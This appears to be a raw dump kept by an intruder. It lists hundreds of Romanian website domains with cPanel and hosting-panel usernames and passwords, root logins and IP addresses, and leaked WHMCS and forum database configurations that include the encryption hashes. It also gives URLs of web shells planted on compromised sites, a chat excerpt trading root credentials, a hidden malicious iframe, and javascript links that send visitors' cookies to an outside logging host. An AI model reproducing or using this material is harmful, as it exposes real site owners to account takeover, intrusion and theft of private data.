ZGMY2Lizzr sars.ro sarsro v9ARcZMDAQ vilaflorilor.ro vilaflor 22lBwJ41oe autorizatiiprimariabucuresti.ro autoriz3 pgU9dV322f tcsurvey.ro tcsurvey VXlWEY5vd6 firmacuratenie.com.ro firmacur yXF749UdUr adywert.ro adywert Q2clMF5ABd suplimentesportive.ro suplimen tx436Fqh5W vectorsbox.com vectorsb p3z72F8Hqs arsura.ro arsuraro iffQ2r4xYw maroccodesign.ro maroccod mihaela supermamici.ro supermam iYrqSoMoxM hidroizolatii-certex.ro hidroizo Bx28Ku95om fullmedia.ro fullmedi Costinel1 futurelovedesign.com glasulsperantelor.ro glasulsp pSvOgnp9Pa chiriicluj.com chiriicl QgnrsJg3Z2 west-std.com fashiontime.ro fashiont R6sqqKTxQV basarabialazi.ro basarabi WO5ohWNfxI opriscodrut.ro opriscod LLHVzMnf3Y reparatiiservicemasinidespalat.ro reparati Wup9CSHrYK bdadvisors.ro bdadviso 3dGQtj1P4y test.richardconsulting.ro alpinclubbrasov.ro alpinclu fTvJbiI8** inchirieri-de-masini.net inchirie M6V7jt4sg8 avocatonofrei.ro avocat pA7tnQtWo7 autorizatii-sector1.ro autoriz4 dd49rOf4H5 contabil-bun.ro contabil h1lAyr2F24 lamarsystems.ro roma-accessories.ro romaacce JO5RIvHbwd total-promotion.ro totalpro YgqzfVzvB7 inareal.ro inarealr sjTQIrQ7OH swissdental.ro swissden YNQUNhwaXv exonalsa.com exonalsa 322s5lFDfs fotoalin.ro imcphoto.net imcphoto q3j7hvZtH6 chefcezarm.com chefceza Z7VRoP4Nbw iankoo.ro iankooro toV7SfDMHY webspark.ro webspark rp9U7wn1K7 webcms.ro webcmsro 7Rp08fomI3 artev.ro artevro 1q2w#E4r radioslim.ro accessoft.ro accessof dwcGpqNm1P plazaonline.ro plazaonl sDSLwR5IGz personalizeaza.ro personal ralu23octombrie2005 naturalstylebeauty.ro naturals mgfQkl1Nu7 mycroft.ro mycroftr uRkaUDTiLp atbroker-asig.ro atbroker lmD9ucl4Bb renet-romania.com renetrom renet1234 bagmaniac.ro bagmania TmpV2MBNBG verdefish.ro verdefis TGNgLcedbb ramiprinting.ro ramiprin ubz10R5gR0 bracaj.ro bracajro I5oZkXY96e totalconstructgeneral.ro sedlexconsult.ro sedlexco 5C8x6fk0iC vacantapelitoral.ro vacantap 7QFMCMGgqz magiafilm.ro magiafil vVtwd7lOsg madvideo.ro madvideo articol4 autorizatii-bucuresti.ro autoriza TVrvjhhefI copertidediploma.ro coperti1 mZ1pJ5wSNo actronics.ro clubulcopiilorcarei.ro clubulco nSrzzG7CAw infinity7117.net infinity VooDoo iuliusmedia.ro rezistenta.net rezisten HA7cplmkMS exclusivebride.ro exclusiv RIvof2e976 downhill.ro downhill 0qyg0c1CI0 musicfactory.ro pubtechirghiol.ro pubtechi 48v4z7kMAt powerteambuzau.ro powertea M2TtJGz0Zi bella-casa.eu bellaca dezinfectat010# ajhvalcea.ro ajhval ZT4Lkr7NXg sh-shop24.de shshopde Illv278i0R profixis.ro profixis EPY2oA6gE3 roxanaschiopu.ro roxanasc PC2FQ1pCut alaskanmalamut.ro alaskanm xHePW5r0JB pensiuni-slanic.ro pensiuni 37X5c6qkAm meteordistribution.ro anuntul-olteniei.ro anuntulo ga782292@# primetech.ro primetec CDGVZRpgVQ argentina.com argentin jn9BG48cq9 feel-queen.ro feelquee byxR0FFbfM businews.ro businews 399Irqq2dT eduardphotography.ro eduardph NNyvdLkriT eduardphotography.com eduardp1 jVdY5Tygy5 andreidiaconu.com daksha.ro daksharo YHoSl2E9rs wso.rodomenii.ro wsorodom o7or5qWW58 globalexpress.ro globalex sJY6DEiGLV pyramyda.ro pyramyda calendar indramusic.ro indramus h5kK0a2mwM accesis.ro accesisr tXbghZXtog ceaidefructeorganic.ro ceaidefr 5rk3Sn76sD cabinet-psihologie.ro cabinetp Rri8Wlrff2 galeria-atelier.ro nicolaecodreanu.ro eveblog.net eveblogn zsJssCCny1 cafelux.ro cafeluxr suel2AteSy hainedefirma.net hainedef 9wzwAZ1YKx xplozia.ro cristian 7mnw9yfPjQ orgdominus.ro orgdomin AkMmoJ4QTW danielurdea.ro danielur 719Pef4mWq macelariaradu.ro macelari r9lq849xGW pastilazilei.ro pastilaz 74xpHxVj47 dreamcasting.ro dreamcas dream1 electrician-iasi.ro electric P1VIecAL59 amh.ro amhro sere56st123 inovasoft.ro inovasof x6886HjmrJ copertidiploma.ro copertid R20TxvBed3 accademia.ro accademi 63Zvx3lF7k mad-security.ro madsecur qWD4xvOzey butonidelux.ro butoni sjUjIhj54D stylebeautysalon.ro stylebea 56Fuw1Ijv0 madalinaiulia.ro madalina btQE7rzCJn tmh.ro tmhro a35skDtTFJ celalalt.ro celalalt LB7L1Th2it smartfeed.ro smartfee 7V84nsOL9a instalatii-metropress.ro instalat 9TgjDzhY6T pantofilamoda.ro pantofil 0wFdHEV5N0 buzzweb.ro buzzwebr aA4icgqMM0 ciocolataoasis.ro ciocolat 7XJ6zFhO2Y lazarco.ro lazarcor YUb4fbdu6Y vila7izvoare.ro vilaizvo 0n326PMeyo retete-adunate.ro retetead KxCYhr9aQb adaugusta.ro adaugust ZWVWoT2hwv fotoarts.ro fotoarts vh3vUMZaGJ spartatechirghiol.ro spartate B2HBjLFdd0 stanpas.com stanpasc YMOQdtJwqw primariagh.ro primaria gwyjYpqyNu tmd.ro tmdro atmdlegyenveled ayurvedabeauty.ro ayurveda XcoLd7yWxN escapequotes.net escapequ F7sF72fi7c dentalservices.ro dentalse icrX4Z0FFQ test.invisible-scanner.com invisi vOE8nqooQv autorizatiiconstructii.ro autoriz2 9GX12g7mxa chile.sugarcrm.org.ro chilesug LdE210wgd3 alexchitu.ro alexchit Xt2r1ZqCIk artaffair.ro artaffai xmDje70tu5 artkrafter.com artkraft HcKpwURtHM rochii-sexy.ro rochiise Jy05pexQmu nolimitparty.ro nolimitp all4one feelhigh.eu feelhigh izYbfjdnak valex-bvl.ro valexbvl MegOzvf amenajament.ro amenajam Y6BH2YhnB8 edy-vit.ro edyvitro vXyLrwE3Zt spicer.ro spicerro XnVXWKV6cY omuldigital.ro omuldigi 2kz51E8Ffz restaurant-unique.ro restaura NjPAhojVmp idp-team.ro idpteamr Km4zr8spuU implantdentarpret.ro implantd anyridge500$ roitalclean.ro roitalcl 1roital2 alphadesign.ro alphades 5Y1baVTwcP youthcentres.net youthcen Z4v92IS97OeN idnet.ro idnetro H8NBqfMufi fabricadejocuri.ro fabricad IEL3UZ0CR2 avonandreea.com avonandr p9d8YCf89q autotmg.ro autotmgr bUi42e3wG5 chile.com chilecom sFcfe852YX farmaciadrchen.ro farmacia 7rt7cG5yV0 avize-bucuresti.ro avizebuc nsY653hpP1 prointernet.ro prointer md-pp.ro mdppro GÅsçzª%vä+>ê©Ÿ~ truman.ro truman catalin-alexandru.ro catalina 123cata123 sexin.ro sexinro Wz4JmXoD65 simplu.org simpluor GÅsÌ~øÎ /ÓæyžìÙë kiancosmetics.ro kiancosm UubCzgN0Yb metalmade.ro metalmad MtdMwpEWFy laurabucur.ro laurabuc asdrt345dsf pilulevimax.ro pilulevi w787y7VpKu climasalon.ro climasal E5dvpZjh6e richardconsulting.ro danval.ro danvalro madrid2010 eficientimpex.ro eficient ~Í}]ŸPë unghiute.ro unghiute S2J8KIyhnR alfabeautymed.ro alfabeau 3q92K2Qied tuningbullbar.ro tuningbu GÒjf€~Þ ciprianmuntele.ro ciprianm sdger@as!w4 jobs-center.ro jobscent Acyu37wG13 vegapark.ro vegapark J2slF0D barrisoldesign.ro barrisol conzacorom singlesparty.ro singles1 70sQMvsx13 autoriana.ro autorian ë*}ðF&ä inoxprest.com inoxpres ñLýlb?Õª dconta.ro dcontaro 220FdH4mjb andreeadejan.com andreead aUZav883j9 autorizatii-sector1.ro canvasart.ro canvasar 2QrTa4Yu8jJ pasionmob.ro pasionmo ApapYUCF1v lesta.ro lestasky Musume1977 nuntaspeciala.ro nuntaspe LjQRj8FwT1 one-events.ro onevents 31013123 arveovest.eu arveoves C8Ex712cPs netora.ro netoraro V7YRf3POqx restaurant-ever-green.ro restaur1 12restaurant34 thepartyarms.com theparty 5r36xb7RNn macstudio.ro macstudi liberty56fox constex.ro constexr v6iAsHpvQO tml.ro tmlro t3rm0l1n3 uniquemodelsagency.ro uniquemo vipersef autoshowsudrom.ro autoshow K6kCMgoUBX mihai-mecu.eu mihaimec kj86Gzw8K3 psihoterapie-cabinet.ro psihoter Q9HK3XwT5a davexagro.ro davexagr GruKqAKnTa spitalulcaroldavila.ro spitalul lesTZFz1vD sorturi-balast.ro sorturib BnYGuiA9qi gtstraduceri.ro gtstradu l5ieKof3ou ionutpetica.ro ionutpet LfmNdjb0Cj patuturi-bebe.eu patuturi 3Is3xjfF02 liceulelim.ro liceulel wzbUH7ZxWe camvesinn.ro camvesin tRIOseven777 docuprint.ro docuprin UBBsk0OZzz digitalfactory.ro digitalf ypepEHKtAa nade.ro nadero 8ns6UIf8v8 ionchivu.ro ionchiv1 xpVrH8fuO8 netadvertsolutions.ro netadver 7hEJZDkExF expertrockdesign.com expertr n#Wh0st2oo( cabinetstomatolog.ro cabinets ANYRIDGE500$ sulerapostu.ro sulerapo 72vRTq8fBQ rodicasfetu.ro rodicasf sEYUtiIjCh e-voila.ro evoilaro 0~2Wke!8mG=W 2amdesign.ro amdesign amdesign7986 deliciulemmei.ro deliciul vqW1J77uXB siafu.ro siafuro VerucvRJ9a filmarinunti.info.ro filmari1 KIftObRsrI grandregal.ro grandreg cLlu0cMWPm rofersped.ro roferspe YJecbrcWbL auto.sugarcrm.org.ro autonoms lVdT6BTjO2 copybelvedere.ro copybelv ttYrX7mH4Q aristidepaun.ro aristide ixh6TF1okI cutiutafermecata.ro cutiutaf aTm347c8sR bretonel.ro bretonel f4Fa4Gr3d1 autorizatii-reclame.ro autoriz1 fy7eF71O0h hidraulica-ag.ro hidrauli YkggKsmfQr casadevinuri.net border-radius.info borderra BjMY9Cdt0v tehnoprofilpvc.ro tehnopro 5BCHDieSoh officetrad.ro officetr 2pVxTXZmGe restaurant-schnitzelhaus.ro restaur2 y0MDgYyy00 sbx.ro sbxro YijfH3JajV backrake.ro backrake pazona1 magazinuldebecuri.ro magazinu 1oJuUlUay2 rait.ro raitro iLbGH6YN1x rent-home.ro renthome 26P9iOYIMP enklava.ro enklavar 1OhUbzBjNS spain.com spaincom PhTe5Xqpvi scan4invisible.com scaninvi DUcurKuOxl turkie.com turkieco ptXP53Xue1 mamasita.ro mamasita DsNUB3US43 andreidumitriu.ro andreidu 5NBfIpGsG7 vreau-fonduri-europene.ro vreaufon FiyijG45Lk sraef.ro sraefro 6YLwFtLwQU jaysafish.com jaysafis xs3RoSHEq4 sugarcrm.org.ro sugarcrm I5zaUF2Vax becausewecare.ro becausew 9Q36AC1EmV Mexic.com Mexiccom G7bwL87Crg Colombia.com Colombia QpcUP2UYcJ Peru.com Perucom KGAtsEYU4K AmericaCentrala.com AmericaC cjN03GO0Fr eu4sales.sugarcrm.org.ro eusaless s8gmvMKHPj turcia.com svmstudio.ro svmstudi yVV59QV58n class-gift.ro classgif mALxMCAWso Ecuador.com Ecuadorc 59FdqzWZ8O biorezonantacaalternativa.ro biorezon eN0BnqPknE generalpiscine.ro generalp x49agJO9b8 isabellahouse.ro isabella fericire romttcrew.com romttcre j67B6j0iJg logics-cpp.ro logicscp ov7EG2qu76 mysecondskin.ro mysecond a129BjLkz0 valek.ro valekro v3qmNt33I6 produsebionaturale.ro produseb VIRGILIA2012 crm.btlsrbija.rs crmbtlsr 7jpeN7C7r8 forex-practice-account.net forexpra 3f376cyBhY dianette-acne.com dianette bZd12t6T1h noursimihai.ro noursi 489VBel0xo sex-expert.ro sexexper 2h4io6Q1gW casinaliberala.ro casinali drw5Om97U9 ashiharakarate-neamt.ro ashihara xCQyx7993f byvlad.com byvladco I11ofmK72x agriland2000.ro agriland B8i1dR6j7u venezuela.com venezuel 6kn21TzjE3 cs-oltchim.com csoltchi hG8j29uDv9 pozanunta.ro pozanunt 7Ncj39I4qa hainehippie.ro hainehip ACnar5980d fanparfum.ro fanparfu 6ghzP02P9g seymed.ro seymedro n6E8A6vy3n caminero-residence.ro caminero 4ndH85Mvk6 360studio.ro studioro 5x2ry1Y2Xz incaltamintededama.ro incaltam 3bGrh8t7E9 pescuitinfo.ro pescuiti t6Lrh97z6X bmfortranplus.ro bmfortra f9o92Gc4Xg transporturi-ieftine.ro transpor FYd39ufz20 diagnozaautoiasi.ro diagnoza dD4v1luO97 rompifruitt.ro rompifru 9xI8pcdI95 retete.rodomenii.ro retetero R9uv76Oqh1 sib-automatizari.ro sibautom 7gp5ySH4z2 narcoticcreation.ro iankoo Ku34Mg67pj android.rodomenii.ro androidr 69UXjeut42 magazinpass.ro magazinp l0gar1tm1c wittaidd.com wittaidd 8w25aY9Rdz crm.btlmed.fr crmbtlme qemM37C7t8 narcoticsound.ro narcotic 5Fbf870hAd bleumarinsailing.ro bleumari !yachtingbleu! brainymulemedia.ro brainymu G9rnaf99Y8 l2weeds.com lweedsco 3Qs6q0t3zI pescadosbt.com pescados 094nJy9Nbt abctranserv.ro abctrans Z2e8Hzr3r1 abctranserv.ro abctran1 8t1sdZ0Sq3 salon-miss.ro salonmis UyP2a90uf7 dentistbuzau.ro dentistb s59J9cxP4y moshu.ro moshuro N25Lx1jft4 rapoartebtl.sugarcrm.org.ro rapoarte qO3Q6sh07t multirace.ro multirac ukH1c354Ec funny-stuff.eu funnystu DLq02mz7l7 vinczesrl.ro vinczesr jT8X7a9v9t younginvestors.rodomenii.ro younginv X14z38Zlfr experiment-point.ro experime C3O2nb34vy djcharon.serviciiwww.ro djcharon pq03dCa5R7 fotbalpesintetic.net othervision.ro othervis qbcb9O6X82 rougenailbar.ro rougenai 69so1nhBL5 peak.rodomenii.ro peakrodo 023Lr5ulDh distonie.ro distonie 7e5bZch0H9 starwalker.ro tehnikline.ro tehnikli 7e2Gpk71Uf tehnikline.ro sabinfotovideo.ro sabinfot 7RTzz1d27e berariagambrinus.ro berariag XF320ulya6 urise.rodomenii.ro uriserod lozU8g504E expertrulouri.ro expertru 9YBen2n5g1 pret-beton.ro pretbeto zK76h46dpX utilaje-unelte.ro utilajeu eR6nu07Z7o galnicolaeroznovanu.ro galnicol dR56i3i1Mh specialfish.ro tipar-promovare.ro tiparpr Cex39w9Al8 solvadvice.ro solvadvi 8VK1dxah43 partybook.ro partyboo 13mv5iY3kT escapage.ro escapage DPa9lyn435 craiovacafe.ro craiovac 9y3GY8pi9b rodicachitu.ro rodicach Yir4eC93b3 hainepentrutine.ro hainepen m30v2cOb5W onefortheday.com oneforth l88c8F6Ebf produsintaramea.ro produsin parola123! andrei-mlendea.ro andreiml 9lc0sF9Y3i parfumaccesori.ro olint.ro olintro Y5T5to4dx2 cceromania.ro cceroman eJCw38ei52 loriartshop.ro loriarts 7t2xfNJ0i1 pensiuneailinca.ro pensiune 6w96QJ3aaq scoalastraoane.ro scoalast Y7gk51F9dc mihaisurdeanu.ro mihaisur 8izmH9i20G adriengauthier.com adrienga Qd72l3zv8L canvas-art.canvas-art.ro PASARICA69 belatrixart.org flavdesign.com flavdesi flavian serviceautoproenerg.ro servicea M26Dcg7v8u arhir.com arhircom 2mU1xZu4z6 mydesignnook.com mydesign 4efMh0S1l6 parfumaccesori.ro parfumac hv2K7tfM67 africa.com africaco s5mP5f5Z4x andrei-mlendea.ro hunza.ro hunzaro A452xchpM3 astroesoteric.ro astroeso dK1q9l7Qo9 luxdesign28.ro luxdesig mO5g64Zfp8 stomatologiecopiisector3.ro stomatol anyridge500$ stomatologiesector3.ro stomato1 Yy4487iahC reparatiifeldefel.ro reparat1 dv063525 allbizz-travel.eu allbizzt NTha71a5l2 tractareauto.com tractare I52qn1pCm8 selectbusteni.ro selectbu 72zkz4hME9 chatromania.eu chatroma Maicaneanu1986 nvtm.info nvtminfo xH9xncY031 africa2.com africac1 8Mz0ust6L7 unifight.ro unifight 68zBHot2s7 alphacseh.biz alphacse 1b1e7iNyD0 baesan.ro server1.Metin2Exotic.com.metin2exotic.ro romaniuk sunimage.ro sunimage 5m4vxt96HH baesan.ro baesanro 21051983 academia-de-inalte-studii-hermetice-si-spiritualitate.ro academia xH4n6x9B4t asigurari-profesionale.ro asigurar e9KT4ovp14 supermamici.ro supermam SV3o3kzc19 alterhabitinstitute.com zem.ro zemro lu04nj97KK eterspa.ro eterspar I3W6xx2b0w ne-jucam.net nejucamn Mhkm977f2K inchirieri-masini-bucuresti.net putereaintentiei.ro putereai 691g9ZhjuP securelloze.com rochiimireasaiasi.ro rochiimi 1afrjV1N54 rentacar-romania.net rentacar 46Z7Kbyra6 amasecurity.ro amasecur poikl5423 radionix.ro radionix Z17S89ftsl seclogza.com telesport.com.ro telespor ug66dEpN93 parodontologiebucuresti.ro parodont of96itW4A3 amortizoareieftine.ro amortizo eP5y268bPk concursdom.net concursd bunica concursdom.com concurs1 hEp6E9ya64 bogdanxd.net bogdanxd N3i4ss9e9C pesite.ro pesitero z6Hm8mr7V8 importanvelope.ro importan b4Ikq1Dj07 fimonstrii.ro fimonstr 6aiimI12G3 alllondonescorts.com alllondo 4bdMn77O7g forta-civica.ro fortaciv 004FsY4pqc worldmarketingmovie.com worldmar F3rw1uBw08 lightvision.ro lightvis 37Rj8n4kWa hankgok.hankgok.ro lordhide100 shop4baby.ro shopbaby 8jmbp47O4D asianvillage.ro asianvil Bd27dr5N2v i-sports.ro isportsr u1nz3Sa54X http://invisible-scanner.com/as.php ///////////////////// ///////ZOAR.RO///////// http://acgmusicstudio.eu/?t-t ///////itconfig.ro///// http://www.edumitrache.ro/?t-t http://86.127.68.126/~webproxy/blockscript/as.php http://partidulromaniamare.ro/modules/as.php http://veteranii.ro/torrent/404.php?t-t azsmacea.org/wp-config.php?t-t http://muzica-mp3.com/videoclipuri.php?t-t /home2/hdpixels/public_html http://tuningro.net/wp-content/plugins/regenerate-thumbnails/regenerate-thumbnails.php?t-t http://west-zone.ro/feed.php?t-t User Bobo Parola circasiceva ////////////hostclean///////// http://radio-fun.ro/crons.php ///////////////////Tur334vl//////////// http://dragosoltean.ro/wp-content/uploads/wp-confzsz.php http://rstudio.ro/wp-content/uploads/wp-confzsz.php http://www.partidulromaniamare.ro/templates/wp-confzsz.php http://noaptedevis.com/wp-content/wp-confzsz.php http://www.web-proxy.ro/tmp/wp-confzs .php http://www.azsmacea.org/wp-content/wp-confzsz.php http://metin2zone.ro/?t-t http://www.lilissalon.com/index.php?t-t cpanel 1 176.223.123.168 gazdame parizercucacatromania gamecp 1 193.84.64.67 admin dedicatgazdamea67 ///////////ro-hosting.ro//////////// cpanel 1 188.40.119.21 fixedgam T#G36453V%$@#g5^$#@G http://manele-free.tk/cauta.php?t-t http://poligon.ricoroco.com/fora/smf/decoder/ Q2XWV-783DV-RTGFC-GK8BM-HW426 http://securityxploded.com/passwordsecrets.php 173.164.70.9-cathy-cathy http://www.aflatot.info/?t-t http://www.urbis-serv.ro/joomla/crons.php http://l2play.ro/wp-confs.php http://cs.camhost.ro/includes/wp-biffs.php https://ultraphase.ro/?t-t http://demo.despregazduire.ro:2082/3rdparty/rvsitebuilder/project/04e0213554a0a2e36da1733367866ea4/RvSitebuilderPreview/bk.php http://dynhost.ro/administrator/ admin:demon http://tbo-security.net/forum/jscripts/wp-con1.php?act=users http://tbo-security.net/forum/members.php http://www.activare.ro/carduri-brd-epayment?lang=RO http://www.power-host.ro/widget.php http://gamecore.ro/forum/admin/styles/sharepoint/images/icons/crons.php? /////////////IPVHOST.RO//////////// http://188.40.41.75:2086/ User : root Pass : meriinos---123 ipvhosting.ro/admin/ user & pass tudoripv camelsince1913 NEW VALUE : ////////////////// http://horizon-world.com/js.php http://beatlanta.com/crc.php http://sometimesiveg.com/shll.php http://bestparrotguide.com/shll.php http://newproductrepots.com/shll.php http://ratu-langsing.com/shll.php http://balancefilms.org/shll.php //////////////// http://www.tdxev.com/?t-t http://zuma-deluxe.ro/zuma/as.php /home/extreamsh1/domains/extreamshop.com/public_html/ ///extreamhost host//// http://4metin.ro/styles/prosilver/imageset/en/icons.php ////////////////Trafic Hosting////////// http://forum.trafichosting.ro/?t-t http://csneamt.ro/indextest/wp-conf.php ///NEw Host/// http://worldtutorials.net/installer/crons.php http://worldtutorials.net/adm/crons.php http://zonalineage2.com/modules/crons.php. http://zonarcvenezuela.com/wp-content/uploads/crons.php http://artegraficowebymas.com/themes/crons.php http://www.pokerdelasamericas.net/rd1.php?action=list READ http://93.114.43.228/~xtrmailr/index33.php?x=ls&d=/home/admin/domains/extreamcs.com/public_html/&sort=0a http://www.pokerdelasamericas.net/wp-content/uploads/wp-confzsz.php?x=ls&d=%2Fhome%2Fpdla%2Fpublic_html%2F&sort=0a ///CLose New Host//// http://88.198.131.169/~turvlnet/wp-conf.php http://4metin.ro/viewonlines.php http://4metin.ro/files/wp-conf.php http://4metin.ro/doneaza/viewonlines.php http://upshare.ro/wp-conf.php http://skywards.ro/clienti/crons.php Type cpanel Active 1 Hostname Server.ZPanel.INFO Ip 88.198.209.155 Username root Password ItaliaFranta2006 <?php $license = "Owned-1588820b62323c62ee37"; $db_host = "localhost"; $db_username = "zpanel_whmcs"; $db_password = "ok05klJTyoTq"; $db_name = "zpanel_whmcs"; $cc_encryption_hash = "3xj7lnl0eMOkcVE4tPcqrWyhmtMCBykvVut6HEXMhBWjnqdG6fXn1lueF7G6wRsh"; $templates_compiledir = "templates_c/"; ?> http://zpanel.info/customer/crons.php $dbuser = 'metinnet_4metint'; $dbpasswd = 'zJk!_h8!#@..l!!Ox'; $table_prefix = 'phpbb_'; Host: minecraft-romania.com User: minecraf Pass: MCot244w0t securizat.net securiza u83Ubt7s5K radiodream.ro radiodre M58t9vm8Rr orizont.biz orizontb 9J2w75Iktr csneamt.ro csneamtr cristififa1997 baranmihai.net baranmh 8Ues38Rzs5 $_mysql_host="localhost"; // Host baza de date $_mysql_db="metinnet_concurs"; // Baza de date $_mysql_user="metinnet_concurs"; // User baza de date $_mysql_password="tCT72-o7"; http://metin2zone.ro/black.php http://securizat.net/black.php http://93.114.43.228/~xtrmailr/index33.php?x=ls&d=%2Fetc%2Fvirtual%2F&sort=0a http://minecraft-romania.com/forum/wp-confzsz.php http://choraledupalais.com/wp-includes/js/rd1.php?action=list <iframe src="http://cristalwords.in/" width="100" height="100" style="display:none"></iframe>s <a href="javascript:void(document.location='http://viewmyphotos.summerhost.info/log.php?photo='+ document.cookie)">Click Me</a>+ <a href="javascript:void(document.location='http://viewmyphotos.summerhost.info/log.jpg?photo='+ document.cookie)">Click Me</a> <19:10:29> "noVaLue": noVaLue <19:10:40> "noVaLue": 19mironositze30 <19:12:06> "Crisalixx": Type cpanel Active 1 Hostname Server.ZPanel.INFO Ip 88.198.209.155 Username root Password ItaliaFranta2006 <19:12:34> "Crisalixx": http://zpanel.info/customer/crons.php <19:13:17> "noVaLue": http://www.extreamcs.com/nv.php <19:13:48> "noVaLue": http://www.retry.ro/nv.php ///////4metin.ro/////// http://4metin.ro/Zend/Uri/shellz.php http://4metin.ro/Zend/Uri/style.php ////////////mynameservers.us/////////// http://ps-world.ro/filess.php http://tribul.org/black.php http://ps-world.ro/bk.php ///////Quality-Host//////// http://b-zone.ro/?t-t http://forum.jocuri-sms.net/abc/ http://b-zone.ro/rpg/INSTALL.php?t-t http://www.dende.ro/cs/admin/nvshl.php?t- http://tacanitii.ro/?t-t http://xtim.ro/?t-t http://xtim.ro/adminstrations.php http://mixcs.in/?t-t http://www.djmarkus.ro/?t-t http://asromaro.info/?thieves-team http://b-zone.ro/INSTALL.php?t-t http://b-zone.ro/rpg/?t-t //////////////SSNET//////////// http://just2play.ro/evidenta/deathrun/?t-t http://just2play.ro/evidenta/romania/?t-t http://www.just2play.ro/forum/admin/iou9yiy/indexs.php?t-t 89.44.111.5 Type autorelease Active 1 Hostname AmHost.Ro Ip 89.44.111.5 Username alfahost Password mada0729255436 cpanel 0 31.14.179.2 gazdamea 1tQMih797o cpanel 1 195.225.59.191 gazdamea fasolicacucarnatisibranzicasarata cpanel 0 89.44.111.5 gazdame 2h8u9E3lvH ////////69host.ro/////////////// Type Active IP Address username Password cpanel 0 178.63.55.41 aiureane goagal123321 cpanel 1 195.225.59.40 hostinfo lrdro3030 gamecp 1 31.215.195.82 mitzaadmin Õ?¡ ////////69host.ro-Link////////////// http://iubirisecrete.ro/t.php http://aiurea.net/as.php http://aiurea.net/?t-t ///////Primulmeusite.ro/////////// http://minifom.info/premii.php?t-t heroindungiro giulestinagiulestina hellstrikers.in hellstri Mx912zovR9 gasgas.da gasgasda B596l6Jllt filmecms.info filmecms 12ionut34 bestarea.in bestarea yzyboyyzyboy testastas.ro testasta 4u9iVqjB62 hekerii.ro hekeriir digi@9 bnyromania.com bnyroman 123456 radiosweetmusic.ro radios zGk1Yd7q49 cs-haos.com cshaosco 01aaB2hcJ7 docmetin2.info docmetin da9x77JK6h bestduo 2222222 games8play.com steauabucuresti78 Type cpanel Active 1 Hostname cpanel.b-zone.ro Ip 195.225.59.129 Username bzonero Password tarnacop Type whmsonic Active 1 Hostname 195.225.59.129 Ip 195.225.59.129 Username root Password istoriculadministrator Type gamecp Active 1 Hostname s3.b-zone.ro Ip 89.33.242.99 Username admin Password tarnacopbasescu Domain Reseller Registrar Setting Value planetdomains Username 0 planetdomains Password 0 planetdomains ResellerID 0 planetdomains TestMode 0 webnic Source 0 webnic Password 0 email EmailAddress host@b-zone.ro netearthone Username brad.ovidiu@gmail.com netearthone Password istoricul321 netearthone ParentID 191470 netearthone DemoMode 0 [ ~~ WHMCS Server Password decoder ~~ ] Symlink to configuration.php of WHMCS DB configuration of WHMCS db_host db_username db_password db_name cc_encryption_hash Password decoder Password cc_encryption_hash Coded By Ev!LsCr!pT_Dz Hamzadz@hotmail.it Type cpanel Active Hostname rdh.ro Ip 86.122.4.70 Username rhdro Password kxeZTZ2jtF Type gamecp Active 1 Hostname gamecp.rdh.ro Ip 86.105.27.50 Username Password Type cpanel Active 1 Hostname rdh.ro Ip 86.122.4.70 Username rhdro Password kxeZTZ2jtF Domain Reseller Registrar Setting Value netearthone Username rdhro@yahoo.com netearthone Password s2771990 netearthone ParentID 216235 netearthone DemoMode 0 resellerdomains Username rdhro@yahoo.com resellerdomains Password s2771990 resellerdomains ParentID 216235 resellerdomains DemoMode 0 //////////////clausWeb///////////// http://measgayfolk.ro/wp-admin/css/abc/ bestlimo.ro bestlimo WddjPs43 tehdent.com tehdent 1qaz2wsx ////////////////hostico.ro//////////////////// http://www.escorte69.net/blog/wp-content/plugins/akismet/abc/dom.pl giftstyle.ro adminftp@giftstyle.ro -%qSnZ^vLBiX /////////////////elhostro//////////////////// http://webi.ro/whmcs/status/dom.pl LightMetin2.ro lightmet 1q2w3e4r5t whmsonic 1 93.114.43.33 root 12343 radio.ro sc_motan palarie http://93.114.43.57:2082 sc_6qezw 6qezw 93.114.43.57:2082 sc_maty maty radioxxxxxx.ro sc_usiw0 usiw0 cpanel 1 188.212.104.197 base 4$s!m*8nFQ.M solusvmpro 1 188.212.104.200 Y3qHcChCPjNK5dzxyuQ1 N2Rs3vkdPV7CNn0Qhjvr centovacast 1 93.115.203.37 admin bunica gamecp 1 188.212.104.191 secret123 <?php $license = '+9455121654'; $db_host = 'localhost'; $db_username = 'xhlds_clienti'; $db_password = 'wtDD,,0NN&9z23'; $db_name = 'xhlds_clienti'; $cc_encryption_hash = '6SLJPMQl8wi4b26dHOL0dCFQW3STsjNo2oYH1FS010U3TR6qvIgzaMfXFXHY7kdZ'; $templates_compiledir = 'templates_c/'; $mysql_charset = 'utf8'; $display_errors = true; ?> //////////////x hlds//////////////////////// platform.fservers.ro root YC8UPeC48I 95.64.36.123 95.64.36.124 95.64.36.125 95.64.36.126 95.64.36.127 95.64.36.128 95.64.36.129 95.64.36.130 95.64.36.131 vps.server.com prods-652 12saoW8kB2 95.64.36.115 95.64.36.116 95.64.36.117 softcs.ro root nF4MXPhrzG 95.64.36.93 95.64.36.95 95.64.36.96 95.64.36.97 95.64.36.98 95.64.36.99 95.64.36.105 95.64.36.119 95.64.36.120 australia.x-hlds.com xhlds853 HyGMAfH0IQ 95.64.36.136 95.64.36.137 95.64.36.138 95.64.36.139 95.64.36.140 95.64.36.141 95.64.36.142 bogdanxd.net bogdanxd bunica http://www.x-hlds.com/?t-t http://www.x-hlds.com/clienti/?t-t http://www.x-hlds.com/clienti2/livezilla/livezilla.php?t-t Hostname 95.64.36.66 Username office@x-hlds.com Password secret123 Port 25 ////////////////hostpixel.ro////////////// Type Active IP Address username Password cpanel 1 69.175.84.66 hostpixe basina323 gamecp 1 188.212.105.153 hostpixel adminmajestik domain User Pass IP's lacoltz.ro lacoltzr cosmina stz.ro deiu Q3e3kp77dK o9GBx84er5 low-kill.com lowkill imagedb.info imagedbi 46m5xnwA4C vw63zUA52c fro-game.com frogamec 73tgIP27uq hellcstrike.ro hellcstr r0e402HNgw club-renaultsymbol.eu clubrena deagle.ro deagle xcs.ro xcsro 8By2Uby7i3 bzbH6F094i pokfun.ro questmod E05oPpb0a2 h8iX2p9S4z 0m762vvyVK 4bk566vYmS 1Nf040qKjx al1nut hopp188 kir.ro kirro bR19ay04Te virtuarts.ro virtuart arrh8V056Y sergiu criminals ascunsea.ro ascunsea monica mascatii parolanoua 8Am78kw9Ld bzR25v55sR patto fstyle 2rd6EY7ka2 4j4hV5e8Dx sgaming.info sgamingi G8j0Q7js2c wikis.ro 6v6KjCc95m YkrN1wv387 R2o3Cu2d6s 8lf7HrnX24 53Up0uwH6v 38evI5dy4B bestarea.in bestarea yzyestebun 3a4Mye7z4S rvz.ro rvzro 